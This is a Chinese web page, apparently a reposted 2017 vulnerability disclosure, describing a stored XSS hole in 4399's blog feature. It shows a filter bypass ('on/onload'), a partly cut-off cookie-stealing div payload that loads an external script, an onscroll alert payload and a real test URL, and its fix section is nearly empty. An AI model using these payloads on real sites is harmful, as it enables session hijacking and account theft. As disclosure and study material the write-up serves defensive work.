沈陽電腦維修網,沈陽上門維修電腦服務
當前位置: 主頁 > 沈陽網站推廣>4399儲存型xss繞過過濾器及修復方案 >

4399儲存型xss繞過過濾器及修復方案

時間:2017-5-23來源:www.jdflqf.live 作者: 沈陽電腦維修網點擊:
沈陽電腦維修,上門維修電腦
  沈陽電腦維修上門服務13889116605: 4399某功能處可以xss,有過濾器過濾,但是可以通過一些手段進行繞過。1測試地址http://my.4399.com/space-693256254-do-blog-id-114080... 4399某功能處可以xss,有過濾器過濾,但是可以通過一些手段進行繞過。 1測試地址   http://my.4399.com/space-693256254-do-blog-id-1140804.html   請在確認后漏洞后刪掉此地址內容。   24399日志處可以構成xss,此處的過濾器   傳了個圖,插了寫代碼進去,發現會將onexpression\等過濾成.   3經過測試發現,這里應該是對<img>標簽的每個屬性進行正則,只要發現就進行過濾,但是一個字符串只是過濾最前面的一個特殊字符。   就是說onloadonload===》.load.loadononload===》.onload   4所以直接構造onload為on/onload即可繞過   5不過在測試時候發現,雖然可以插進去,F12查看也正常,但是沒有執行。<img>的onload之類的貌似都會重新判斷一次。   比如   //偽代碼   if(圖片尺寸>50){   img.onload="xxx"   } 所以就又試著插了些別的代碼,比如input、iframe等,   6測試之后發現這里貌似只能插入<div><img><a><font><p>等幾個標簽,看來是做了白名單了   所以就用over   7插一個大點的<img><div>效果也蠻不錯誒,基本上進去就會觸發了。(圖中的紅色邊框是div的區域,為了讓大家看的更加之觀點)   圖1   8插入的代碼,以及F12中看到成功插入   圖2圖3   9插入了下盜取cookie的代碼,并成功盜取cookie登錄 將over寫為on/over,會過濾成為.over   插入成功后的盜取cookie的代碼,用F12那里復制出來如下   (這里要注意對script進行下轉換,不然script會被過濾成.)   <divstyle="border:5pxsolidred;".=""over="s=document.createElement(String.fromCharCode(115,99,114,105,112,116));s.src=   圖4   10這里<div>也可以插入以下代碼直接訪問就觸發xss   <divid="xx"onscroll="alert(1);"style="height:30px;overflow-y:auto;width:100px;">abcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabc<aname="t">d</a></div>   div當滾動條滾動的時候觸發   div里面的內容是為了讓div出現滾動條,name="t"那個是為了讓可以直接定位到那里使滾動條滾動   利用地址后面要http://xxx.html#t 要加上#t才會直接到<a>標簽name處觸發onscroll 11至于給管理員通過意見反饋、私信等途徑,發鏈接去xss管理員cookie和后臺地址這些事情我就不干了。 修復方案:   過濾、、  
上一篇:用GNS3做PIX防火墻ICMP實驗
查看[4399儲存型xss繞過過濾器及修復方案]所有評論
發表評論
請自覺遵守互聯網相關的政策法規,嚴禁發布色情、暴力、反動的言論。
用戶名: 驗證碼:
推薦內容
關于我們 服務價格 聯系我們 企業網站優化 沈陽網站建設 沈陽維修電腦
超联赛赛程时间表